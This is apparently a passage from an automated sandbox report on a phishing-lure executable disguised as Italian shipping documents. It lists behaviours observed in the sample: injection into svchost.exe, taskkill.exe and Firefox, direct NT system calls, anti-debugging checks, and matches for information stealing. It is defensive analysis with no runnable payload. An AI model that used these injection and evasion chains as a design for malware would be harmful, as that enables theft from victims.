            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h]1_2_02FBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h]1_2_02F5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]1_2_02FBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]1_2_02FDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h]1_2_03004A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h]1_2_02F2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEB50 mov eax, dword ptr fs:[00000030h]1_2_02FDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h]1_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h]1_2_02FD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]1_2_02FFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]1_2_02F5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h]1_2_02FBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h]1_2_02F30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h]1_2_02F60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h]1_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h]1_2_02F6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h]1_2_02FBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02FBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h]1_2_02F649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02FFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h]1_2_02FC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h]1_2_02FBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h]1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov edx, dword ptr fs:[00000030h]1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0946 mov eax, dword ptr fs:[00000030h]1_2_02FB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB892A mov eax, dword ptr fs:[00000030h]1_2_02FB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC892B mov eax, dword ptr fs:[00000030h]1_2_02FC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC912 mov eax, dword ptr fs:[00000030h]1_2_02FBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28918 mov eax, dword ptr fs:[00000030h]1_2_02F28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE908 mov eax, dword ptr fs:[00000030h]1_2_02FAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68EF5 mov eax, dword ptr fs:[00000030h]1_2_02F68EF5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h]1_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE6ED0 mov ecx, dword ptr fs:[00000030h]1_2_02FE6ED0
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\taskkill.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeThread register set: target process: 7812Jump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 211008Jump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"Jump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: AWB_5771388044 Documenti di spedizione.exe, pSySrLvnviNdEH.exe, 00000005.00000000.2050338043.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000002.3592546456.00000000011F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: pSySrLvnviNdEH.exe, 00000005.00000000.2050338043.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000002.3592546456.00000000011F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: pSySrLvnviNdEH.exe, 00000005.00000000.2050338043.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000002.3592546456.00000000011F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: pSySrLvnviNdEH.exe, 00000005.00000000.2050338043.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000002.3592546456.00000000011F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
